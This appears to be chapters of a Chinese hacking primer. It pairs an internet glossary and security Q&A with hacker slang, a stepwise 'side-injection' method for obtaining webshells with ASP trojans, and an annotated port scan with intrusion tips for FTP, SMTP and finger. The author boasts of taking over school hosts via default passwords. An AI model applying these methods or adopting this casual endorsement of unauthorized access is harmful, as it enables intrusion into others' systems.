Internet中文名也称“因特网”或“国际互联网”。是70年代有美国军方的ARPA发展而来的。是一个由各种不同类型和规模的独立运行和管理的计算机网络组成的全球范围的计算机网络。网络间可以畅通无阻地交换信息。
组成Internet的计算机网络包括局域网(LAN)、地域网(MAN)、以及大规模的广域网(WAN)等。这些网络通过普通电话线、高速率专用线路、卫星、微波和光缆等通讯线路把不同国家的大学、公司、科研机构以及军事和政府等组织的网络连接起来。
Internet为人们提供了巨大的不断增长的信息资源和服务工具宝库,用户可以利用其提供的各种工具去获取其提供的巨大信息资源和先进的服务等。同样可以通过Internet将个人或企业部门的信息发布出去,随时供其他用户访问浏览。
◎ ISP
ISP(Internet Service Provider)是Internet服务提供商。用户只有通过ISP才能接入Internet,并享受各种服务。ISP作为提供接入服务的中介,租用国际信道和大量的当地电话线,购置一系列计算机设备,通过集中使用,分散压力的方式,向本地用户提供接入服务。如果把互联网比作一条信息高速公路,那么ISP就是把你带到这条公路上的人。
◎ ICP
ICP(Internet Content Provider)即Internet上的信息内容提供商。ICP在网上主要以信息服务为主,利用大量的或独具特色的信息资源来吸引人们上网。如果把互联网比作一条信息高速公路,那么这条公路上有没有让你着迷的风景就是由ICP决定的了。
◎ ICQ
ICQ为英文“I seek you”的英文音译缩写。可以利用它在网上找人。所以也称“网络传呼机”,和生活中的寻呼机一样,每个用户也同样拥有唯一的属于自己的号码。使用时要安装相应的ICQ软件。想了解更多,请访问www.icq.com。
◎ IP地址
IP地址是Internet上主机地址的数字形式,与主机的域名地址是一一对应的。IP地址是一个32位的二进制数,通常写成被句点分开的四个十进制树的形式,例如:202.112.223.12等。IP地址通常分为A、B、C三类,这种分类与IP地址中字节的使用方法相关。在实际应用中,可以根据具体情况选择使用IP地址的类型格式。A、B、C三类地址所能表示的范围分别是:
A类:0.0.0.0-127.255.255.255
B类:128.0.0.0-191.255.255.255
C类:192.0.0.0-223.255.255.255
IP地址和域名地址不能随意分配,否则将会导致无法估计的混乱状态,这就象我们生活中的通信地址一样。在需要IP地址或域名地址时,用户必须向国际网络信息中心NIC提出申请。申请批准后凡能够使用Internet域名地址的地方都可以使用IP地址。
◎ IP电话
IP电话又叫VoIP(Voice over Internet protocol)电话,也就是我们常提到的“网络电话”。指通过Internet传输交互语音的应用技术。它可以从数量上减少长途电话,尤其是国际长途电话费用。这种技术最早以色列一家电子公司VocalTec推出。目前这种技术正在被大力的推广应用,由于收费较为低廉,因而受到用户的广泛欢迎。
◎ 163
在互联网上网友们常会听到“163”这组数字,而且有三个。但它们的相同只是巧合而已:
A、拨号上网的用户拨“163”,这是中国电信为用户接入互联网而特设的号码,用户只要到电信局办理完入网手续,然后用Modem拨打“163”,就可以接入互联网。
B、网易公司的域名:www.163.com,这是一家著名的网络公司。是一家主要从事于互联网信息技术业务的企业。
C、163电子邮局的域名:www.163.net,是著名的全国第一家中文免费邮件服务提供商。目前为新飞网公司所有。
◎ ISOC
ISOC——Internet Society ,国际互联网学会。一个国际性非盈利组织,总部设于弗吉尼亚的雷斯顿,寻求保持和拓宽国际互联网的可用性。
该机构创建于 1992 年,由选择产生的理事会管理。成员包括个人和组织 ( 包括服务提供商、产品提供商、国际互联网企业经营者、教育机构、计算机专业机构、国际条约组织,以及政府机构 ) 。该机构主办年度会议,并有大量出版程序。以国际互联网技术操作和开发为先导,国际互联网学会协调体系结构委员会 (IAB) 、国际互联网工程专门工作组 (IETF) 、国际互联网工程指导小组 (IESG) 、国际互联网工程与规划小组 (IEPG) 、国际互联网号码分配管理委员会 (IANA) 以及国际互联网注册管理委员会。
◎ Intranet
一个设计用来在公司和组织内处理信息的网络。是Internet 技术在企业内部或封闭的用户群 内的应用,是一个公司所特有的,不一定与Internet有物理上的连接关系。它的用途包括提供诸如文档分发、软件发布、访问数据库和培训等服务。之所以命名为企业内部互联网是因为它使用了诸如 Web 页(网页)、Web 浏览器、FTP 站点、电子邮件、新闻组和邮件列表等与 Internet 相关的应用程序,但它的作用范围仅限定于公司或组织内部。
◎ 宽带网
也有称作 wideband transmission。一种局域网络,信号在不同的入境和出境频道上以射电频率信号形式进行传输。宽带网络中的节点之间用同轴电缆或光纤缆连接,可以通过多个传输频道同时传送数据、语音以及视频信号,频道之间用频率区分。宽带网适用于高速操作(20兆字节或更快),但是比基带网络昂贵而且安装困难。
◎ 浏览器
浏览器“(Browser)”是一个被形象化了的名词,它是一种用来访问WWW服务的一种客户端程序。也可以理解为用户上网后用来查看主页的软件。目前WWW环境中使用最多的主流浏览器有两种:一个是美国Microsoft公司的Internet Explorer(IE),另一个是美国Netscape公司的Navigator。其他的还有Opera等等。
◎ 离线
离线(Offine)也可以称脱机、脱线,和在线相对。一般有三种含义:
1、当前未与网络连通;
2、对网络的请求没有响应;
3、聊天室里某人不再参加讨论。
◎ 聊天室
聊天室是互联网上的某台计算机作为服务器,所有登录或连接到这台计算机上的用户可以彼此间交换信息。达到你发一句,我立即回答一句的效果,故形象化称之为“聊天室”。
目前的聊天室有两种方式:一种是用户通过安装特定的聊天软件来实现和其他人进行文字交流。还有一种基于WWW方式的,一般作为网络的一个栏目,用户不需要安装额外的软件,只需通过浏览器就可以进行聊天。
◎ MODEM
MODEM就是调制解调器。是调制器和解调器的合称。网友们通常戏称为“猫”。它是拨号上网的必备设备。通过Modem将计算机的数字信息变成音频信息才得以在电话线上传播。
Modem一般分内置和外置两种。内置式插入计算机内不占用桌面空间,使用电脑内部的电源,价格一般比外置式便宜。外置式安装简易,无需打开机箱,也无需占用电脑中的扩展槽。它有几个指示灯,能够随时报告Modem正在进行的工作。
◎ POP3
POP3是Post Office Protocol version3的缩写。即邮局协议版本3。一般通过POP3协议标准,为没有运行邮件系统的主机提供邮件的收发服务。
◎ SMTP
SMTP是Simple Mail Transmission Protocol的缩写。即简单邮件传送协议。在国际互联网上一般通过SMTP来发送电子邮件。
◎ 搜索引擎
搜索引擎是WWW环境中的信息检索系统。它包括目录服务和关键字检索两种服务方式。目录服务可以帮助用户按一定的结构条理清晰的找到自己感兴趣的内容。关键字检索服务可以查找包含一个或多个特定关键字或词组的WWW站点。目前著名的搜索引擎服务商如:www.yahoo.com、www.sohu.com等。
◎ 上传和下载
上传和下载是指在互联网上文件传输的专门术语。当一个网友把自己计算机上的文件拷贝到远程计算机上的时候,我们就之为Upload,也就是上传;相反,当一个网友从某台远程计算机上拷贝文件到自己计算机上时,我们称为Downloan文件,或简称Down文件,也就是下载。
◎ SET协议
SET协议(Secure Electronic Transaction,安全电子交易)是由VISA和MasterCard两大信用卡公司于1997年5月联合推出的规范。SET主要是为了解决用户、商家和银行之间通过信用卡支付的交易而设计的,以保证支付信息的机密、支付过程的完整、商户及持卡人的合法身份、以及可操作性。SET中的核心技术主要有公开密匙加密、电子数字签名、电子信封、电子安全证书等。
SET协议比SSL协议复杂,因为前者不仅加密两个端点间的单个会话,它还可以加密和认定三个方间的多个信息。
◎ SSL协议
SSL协议(Secure Socket Layer,安全套接层)是由网景(Netscape)公司推出的一种安全通信协议,它能够对信用卡和个人信息提供较强的保护。
SSL是对计算机之间整个会话进行加密的协议。在SSL中,采用了公开密钥和私有密钥两种加密方法。
◎ SQL
SQL是一种结构化数据库查询语言,其发音为“sequel”或“S-Q-L”。尽管MICROSOFT以其特有的方式加入了所有权声明,但它在大多数据库应用中近乎成为一种标准。简言之,它是一种使用你选择的标准从数据库记录中选择某些记录的方法。
◎ WAP
WAP是Wireless Applecation Protocol即无线应用协议的缩写。相当于无线上网的TCP/IP。具有WAP功能的终端设备,如WAP手机,通过手机内置的微型浏览器,经由数字无线网络,如GSM网络,登陆互连网。
WAP内容用WML编写,在手机上显示的内容以文字为主,没有很多的图象和色彩。
WAP的最大优点是移动性,用手机你可以在任何时候,任何地点上网,可以进行阅读新闻、收发E-mail等。
另外,通过网络可以知道用户的所在位置,也就可能把与位置相关的信息提供给用户,如交通信息,附近的医院,饭店,酒吧,电影院,提款机等信息。
目前可以上网的手机有Nokia7110、Siemens3568i、Motorola a6188等机型。
◎ WWW
WWW有人称做万维网或环球网,是World Wide Web的缩写形式。简称Web。是基于超文本的文件信息服务系统,用户可以通过浏览器搜索和浏览文字、图片、声音和视频等信息。WWW的服务特点在于高度的集成性,它能把各种类型的信息(如:文字、图片、声音和视频等)和服务(如:News FTP Telnet Gopher Mail等)无缝连接,提供生动的图形用户界面。我们访问的www.sina.com.cn、www.163.com等站点都属于WWW的服务形式。
◎ 网站
是一种通过互联网相互连接起来的,为用户提供网页服务(Web Server)、数据传输服务(FTP Server)、邮件服务(Mail Server)、数据库服务(Database Server)等多种服务的信息载体。它通常以虚拟主机或主机托管的方式进行存放和运作。网站一般拥有固定的域名,如:www.yahoo.com、www.163.net、
◎ 网管
网络管理员的通常称为“网管”,是管理计算机网络操作的人。网管的职责包括安装新工作站和设备、维护授权用户列表、保管文件、监督口令保护和其他安全措施,管理共享资源的使用以及处理故障设备。
◎ 网络协议
网络协议即网络中(包括互联网)传递、管理信息的一些规范。如同人与人之间相互交流是需要遵循一定的规矩一样,计算机之间的相互通信需要共同遵守一定的规则,这些规则就称为网络协议。
一台计算机只有在遵守网络协议的前提下,才能在网络上与其他计算机进行正常的通信。网络协议通常被分为几个层次,每层完成自己单独的功能。通信双方只有在共同的层次间才能相互联系。常见的协议有:TCP/IP协议、IPX/SPX协议、NetBIOS协议等等。在互联网上被广泛采用的是TCP/IP协议,在局域网中用得的比较多的是IPX/SPX.。用户如果访问Internet,则必须在网络协议中添加TCP/IP协议。
◎ 网民
拥有固定的帐号或长期使用Internet的人一般称之为“网民”。是通过Internet或其他网络参加在线通信的人,尤其是会议和聊天服务,例如 Internet 新闻或具有Internet电子邮件访问能力的BBS网络—— Fido 网。
◎ 虚拟主机
虚拟主机是使用特殊的软硬件技术,把一台运行在因特网上的服务器主机分成一台台“虚拟”的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、Email等)功能。一般来说企业要在网上用自己的独立域名建立网站,必须投资一台价格不菲的服务器,而且要架设专线、专人维护。虚拟主机则是利用电信局的主机为企业开设一个网站,该网站在外界看起来就如同企业自己建立的一样,拥有高速的网络出口。通常公司建立主页都采用这种方式。
◎ 域名
互联网上的站点就象我们生活中的机构或家庭一样要有个地址,网民才能根据这个地址进行访问。其计算机的身份标识是32比特的二进制代码,也就是所谓的IP地址。为了便于记忆,按照一定的规则给Internet上的计算机起的名字就叫做域名。例如中央电视台的域名为:www.cctv.com。按照Internet的组织模式,对域名进行分级,一级域名主要有以下几种:.com(商业组织)、.net(网络中心)、.edu(教育机构)、.gov(政府部门)、.mil(军事机构)、.org(国际组织)等。大部分国家和地区都拥有自己独立的域名,例如:cn(中国)、us(美国)、uk(英国)、hk(香港)等等。二级域名如:supercool.163.net。
◎ 一线通ISDN
ISDN 是Intergrated Services Digital Network的缩写,即综合业务数字网。俗称“一线通”,顾名思义,ISDN将电话语音和电脑多媒体数据集成到一条高速的数字传输网络线路中,仅通过一条“线路”就可以为客户同时提供语音服务和数据服务。目前可连接8台终端或电话,有2台终端(例如:一部电话、一台计算机或一台数据终端)可以同时使用。具有以下特点:
1、一线多能——利用一对用户线可实现电话、传真、可视图文、数据通信等多种业务的通信。
2、高速上网——在一根普通电话线上,可以提供以64Kbps速率为基础并可达到128Kbps的上网速度的数字连接。
◎ 主机托管
主机托管是把个人或公司的主机放在主机托管提供商(如:电信局)的Internet网络上,起着Internet网络上一台服务器的作用。此主机完全归客户或公司使用和控制。主机托管提供商要收取一定的托管费用。
◎ 在线
在线(Online)也称联机,和脱机相对。一般有三种含义:
1、当前与网络连通;
2、能得到网络的请求服务;
3、聊天室里某人正在参加讨论。
◎ 支付网关
支付网关(Payment Gateway)是连接银行专用网络与Internet的一组服务器,其主要作用是完成两者之间的通信、协议转换和进行数据加、解密,以保护银行内部网络的安全。
支付网关的功能主要有:将Internet传来的数据包解密,并按照银行系统内部的通信协议将数据重新打包;接收银行系统内部反馈的响应消息,将数据转换为Internet传送的数据格式,并对其进行加密。
第11章
黑客术语
什么是黑客[hacker]
黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。
另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。
黑客的起源
一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。
什么是菜鸟
"菜鸟"是一种谦虚的说法,比喻自己的水平很差.就像一只什么都不会的小鸟一样.
什么是肉鸡
所谓"肉鸡"其实就是一种很形象的比喻,比喻那些可以随意被我们控制的电脑.
什么是木马
特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
什么是网页木马[网马]
网页木马就是利用你系统或软件的漏洞,在你浏览网页时下载一个木马程序,再利用该木马来控制你的电脑,盗取你的有用资料!
什么是挂马
就是在别人的网站文件里放入网页木马或是将恶意代码嵌入到对方正常网页文件里,以使浏览者中马
什么是后门
这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机,可以在对方的系统中植入特定的程序,这些改动表面是很难发现的,但是入侵这可以通过专门的工具轻易与这太电脑连接,重新控制该太电脑.
什么是rootkit
Rootkit基本是由几个独立程序组成,一个典型rootkit包括:以太网嗅探器程程序,用于获得网络上传输的用户名和密码等信息。特洛伊木马程序,为攻击者提供后门。隐藏攻击者目录和进程的程序。还包括一些日志清理工具,攻击者用其删除wtmp、utmp和lastlog等日志文件中有关自己行踪的条目。复杂的rootkit还可以向攻击者提供telnet、shell和finger等服务。还包括一些用来清理/var/log和/var/adm目录中其它文件的脚本。
什么是远程控制
使用本台电脑通过网络控制另一台电脑,可以在远程电脑上实现本地的大部分操作,这就是远程控制.
IPC$是什么
IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ ……) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
什么是弱口令
弱口令是指口令[密码]强度不够,容易被猜解
什么是默认共享
默认共享:Windows 2000/XP/2003版本的操作系统提供了默认共享功能,这些默认的共享都有“$”标志,意为隐含的,包括所有的逻辑盘(C$,D$,E$……)和系统目录Winnt或Windows[admin$]
什么是shell
操作系统与外部最主要的接口就叫做shell。shell是操作系统最外面的一层。shell管理你与操作系统之间的交互:等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果。
什么是webshell
顾名思义,"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。
webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现,也有人称之为网站后门工具。
什么是溢出
更确切的说应该是"缓冲区溢出".简单的解释就是程序对接受的输入数据没有进行有效的检测而导致错误,后果可能造成程序崩溃或者是执行攻击者的命令.
什么是注入[注入点]
注入就是程序员在写代码是,对字符过滤不充分,导致一些不怀好意的人提交一些非常的字符之后,可以看到一些敏感信息,比如数据库地址之类的。
注入点就是可以进行注入的网址
例如
http://www.xxx.com/soft.asp?id=123
注入点都是连接数据库的
因此如果发先了注入点如果他的权限等设置的不好的话可以把服务器拿下!
工具可以用domain,啊d注入工具
什么是旁注
1.利用工具或者网站WHOIS你所要攻击的目标资料,得到关于网站的域名注册信息以及主机是否是虚拟主机的确定,因为这样子才可以从旁注入。
2.看服务器上面的所有网站程序,要理解熟悉每个程序的编写以及程序的功能(可以整天去源码站看源码,这样子你就会懂得如何去分别程序了)
3.利用现在所流行的所有漏洞来得到webshell
4.查看主机所开放的系统服务(这个办法是为了得到我们所要得到目标网站的路径)例如:Serv-u的用户配置文件(不是用来提升权限)IIS的用户配置文件(会泄漏大量用户路径的)杀毒软件的LOG(这个可是可遇不可求的)
5.在尽量不接触网站服务器的Admin权限下入侵(为了避免造成不必要的麻烦))
6.建议使用两只以上的ASP木马
什么是提权[提升权限]
现在的操作系统为了安全,都引入了权限这个概念,那么到底权限是什么呢?其实就如同论坛权限一样,普通的会员是不能浏览VIP会员版的.而且普通会员跟不允许更改这个设置,只有管理员可以,所以管理员就是最高权限,这就是所谓的权限.那么如果论坛安全出了问题,普通会员通过其他方法更改了此限制,能够非法浏览VIP会员版,这就是提权.
问:什么是网络安全?
答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭到破坏、更改、泄露,系统可以连续可靠正常地运行,网络服务不被中断。
问:什么是计算机病毒?
答:计算机病毒(Computer Virus)是指编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。
问:什么是木马?
答:木马是一种带有恶意性质的远程控制软件。木马一般分为客户端(client)和服务器端(server)。客户端就是本地使用的各种命令的控制台,服务器端则是要给别人运行,只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。
问:什么是防火墙?它是如何确保网络安全的?
答:使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。
问:什么是后门?为什么会存在后门?
答:后门(Back Door)是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除,那么它就成了安全隐患。
问:什么叫入侵检测?﹖
答:入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象
问:什么叫数据包监测?它有什么作用?
答:数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听”网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就允许某人截获数据并且查看它。
问:什么是NIDS?
答:NIDS是Network Intrusion Detection System的缩写,即网络入侵检测系统,主要用于检测Hacker或Cracker通过网络进行的入侵行为。NIDS的运行方式有两种,一种是在目标主机上运行以监测其本身的通信信息,另一种是在一台单独的机器上运行以监测所有网络设备的通信信息,比如Hub、路由器。
问:什么叫SYN包?
答:TCP连接的第一个包,非常小的一种数据包。SYN攻击包括大量此类的包,由于这些包看上去来自实际不存在的站点,因此无法有效进行处理。
问:加密技术是指什么?
答:加密技术是最常用的安全保密手段,利用技术手段把重要的数据变为乱码(加密)传送,到达目的地后再用相同或不同的手段还原(解密)。
加密技术包括两个元素:算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字(密钥)结合,产生不可理解的密文的步骤,密钥是用来对数据进行编码和解密的一种算法。在安全保密中,可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。
问:什么叫蠕虫病毒?
答:蠕虫病毒(Worm)源自第一种在网络上传播的病毒。1988年,22岁的康奈尔大学研究生罗伯特•莫里斯(Robert Morris)通过网络发送了一种专为攻击UNIX系统缺陷、名为“蠕虫”(Worm)的病毒。蠕虫造成了6000个系统瘫痪,估计损失为200万到6000万美元。由于这只蠕虫的诞生,在网上还专门成立了计算机应急小组(CERT)。现在蠕虫病毒家族已经壮大到成千上万种,并且这千万种蠕虫病毒大都出自黑客之手。
问:什么是操作系统型病毒?它有什么危害?
答:这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作,具有很强的破坏力,会导致整个系统瘫痪。而且由于感染了操作系统,这种病毒在运行时,会用自己的程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程序模块在操作系统中运行的地位与作用,以及病毒取代操作系统的取代方式等,对操作系统进行破坏。同时,这种病毒对系统中文件的感染性也很强。
问:莫里斯蠕虫是指什么?它有什么特点?
答:它的编写者是美国康乃尔大学一年级研究生罗特•莫里斯。这个程序只有99行,利用了Unix系统中的缺点,用Finger命令查联机用户名单,然后破译用户口令,用Mail系统复制、传播本身的源程序,再编译生成代码。
最初的网络蠕虫设计目的是当网络空闲时,程序就在计算机间“游荡”而不带来任何损害。当有机器负荷过重时,该程序可以从空闲计算机“借取资源”而达到网络的负载平衡。而莫里斯蠕虫不是“借取资源”,而是“耗尽所有资源”。
问:什么是DDoS?它会导致什么后果?
答:DDoS也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的方法,但是发起攻击的源是多个。通常攻击者使用下载的工具渗透无保护的主机,当获得该主机的适当的访问权限后,攻击者在主机中安装软件的服务或进程(以下简称代理)。这些代理保持睡眠状态,直到从它们的主控端得到指令,对指定的目标发起拒绝服务攻击。随着危害力极强的黑客工具的广泛传播使用,分布式拒绝服务攻击可以同时对一个目标发起几千个攻击。单个的拒绝服务攻击的威力也许对带宽较宽的站点没有影响,而分布于全球的几千个攻击将会产生致命的后果。
问:局域网内部的ARP攻击是指什么?
答:ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
基于ARP协议的这一工作特性,黑客向对方计算机不断发送有欺诈性质的ARP数据包,数据包内包含有与当前设备重复的Mac地址,使对方在回应报文时,由于简单的地址重复错误而导致不能进行正常的网络通信。一般情况下,受到ARP攻击的计算机会出现两种现象:
1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。
2.计算机不能正常上网,出现网络中断的症状。
因为这种攻击是利用ARP请求报文进行“欺骗”的,所以防火墙会误以为是正常的请求数据包,不予拦截。因此普通的防火墙很难抵挡这种攻击。
问:什么叫欺骗攻击?它有哪些攻击方式?
答:网络欺骗的技术主要有:HONEYPOT和分布式HONEYPOT、欺骗空间技术等。主要方式有:IP欺骗、ARP欺骗、DNS欺骗、Web欺骗、电子邮件欺骗、源路由欺骗(通过指定路由,以假冒身份与其他主机进行合法通信或发送假报文,使受攻击主机出现错误动作)、地址欺骗(包括伪造源地址和伪造中间站点)等。
第12章
从端口说起
有些端口是比较重要的比如135,137,138,139,445之类,那我扫描到的端口到底有什么用?我想你肯定要问,这样今天,我就用一个真实的扫描向你讲述扫到的端口的用途。
被扫的主机:192.***.xx.x
主机IP数:4
发现的安全漏洞:7个
安全弱点:45个
系统:Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (发现安全漏洞)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (发现安全漏洞)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (发现安全漏洞)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(发现安全漏洞)
可用telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机,这种不用密码的远程登录服务是危险的,如果可以匿名登录,任何人可以在服务器和客户端之间发送数据。
发现的可攻击弱点 (21/tcp)
我在那里发现了一个目录是可写的:
/incoming
ftp端口 (21/tcp)
ftp服务TELNET服务一样,是可以匿名登录的,而且在有的机器上它还允许你执行远程命令,比如CWD ~XXXX,如果你能CWD ROOT成功,那你就可以获得最高权限了,不过这样的好事好像不多。另外,有时还能用它获得一个可用的帐号(guest),或得知主机在运行什么系统
13/tcP(daytime)
从这里可以得知服务器在全天候运行,这样就有助于一个入侵者有足够的时间获取该主机运行的系统,再加上udp也在全天候的运行,这样可以使入侵者通过UDP欺骗达到主机拒绝服务的目的
ECHO(7/tcp)
这个端口现在没什么用处,但它可能成为一个问题的来源,顺着它有可能找到其它端口以达到拒绝服务的目的。
(25/tcp)smtp端口
该端口开放邮件传输协议
回应可执行EXPN和VRFY命令
EXPN可以发现发送邮件的名称或者能找到一个完整的邮件接收人的名称。
VRFY命令可以用来检测一个帐号的合法性
我们可以试着发这样一个类型的邮件给它:
user@hostname1@victim
我们会收到一个这样的邮件:
user@hostname1
也许我们就能用它穿过防火墙
WWW(80/TCP)端口
它表明WWW服务在该端口运行
finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等
auth (113/tcp)
ident服务披露给入侵者的将是较敏感的信息,从它可以得知哪个帐号运行的是什么样的服务,这将有助于入侵者集中精力去获取最有用的帐号(也就是哪些人拥有ROOT权限)
(98/tcp) LINUX在这个端口上运行
(513/tcp) RLOGIN在这个端口上运行
这种服务形同于TELNET,任何人可以在它的引导下在客户端和服务端之间传送数据。
exec (512/tcp)
rexecd在该端口开放,该服务使一个破译者有机会从它那里扫描到另外一个IP,或者利用它穿过防火墙。
也许你还能发现很多端口,不同的端口会有不同的作用
我最喜欢开135端口的,我们学校的几个FTP和主机都开了135端口,还用默认密码(不知道是为什么,我想主要是管理员考虑我们找不到肉鸡了『都2004年了,肉鸡很难找的,因为各位大侠都用着呢』,所以特地给我们准备好了),把我高兴的几天都没睡好,可惜里面没什么东西。只能当空间用着了。不过我们学校的主机大都用的是UNIX的,不是瘟二钱的,所以也让人有点郁闷啊,UNIX有点复杂,我只得从0学,还有点难,我会在后面讲到的,现在我们主要是关注WIN2000操作系统的主机了,说到这不能不提一下WIN2K源代码的泄漏,兄弟我在第一时间拿到了这个泄漏的源代码,有230M,还真多,看了一个晚上,也不怎么了解,反正有的是时间,先贴一段,大家瞧瞧,有看懂的,就不用来这看这了,呵呵
贴在网络技术里了
至于软件方面我喜欢用流光(有些人或许不知道这是什么),是扫描器,很好用,是国产的,就是前面访问的小容做的,但他在里面设置了限制不许PING国内的主机,但好多大哥早就破掉了(感觉很幸福啊,不用自己破了),现在的最高版本好像是流光5.0吧,到GOOGLE 上搜一下就能找到N个,我就不说了(要提高动手能力嘛)
下面我来介绍几种常见的扫描器:
一。NSS(网络安全扫描器)
NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查:
■Sendmail
■匿名FTP
■NFS出口
■TFTP
■Hosts.equiv
■Xhost
注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。
利用NSS,用户可以增加更强大的功能,其中包括:
■AppleTalk扫描
■Novell扫描
■LAN管理员扫描
■可扫描子网
简单地说,NSS执行的进程包括:
■取得指定域的列表或报告,该域原本不存在这类列表
■用Ping命令确定指定主机是否是活性的
■扫描目标主机的端口
■报告指定地址的漏洞
尽管没有详尽讨论NSS,但我在这里要说明一些次要的问题:
■在对NSS进行解压缩后,不能立即运行NSS,需要对它进行一些修改,必须设置一些环境变量,以适应你的机器配置。主要变量包括:
■$TmpDir_NSS使用的临时目录
■$YPX-ypx应用程序的目录
■$PING_可执行的ping命令的目录
■$XWININFO_xwininfo的目录
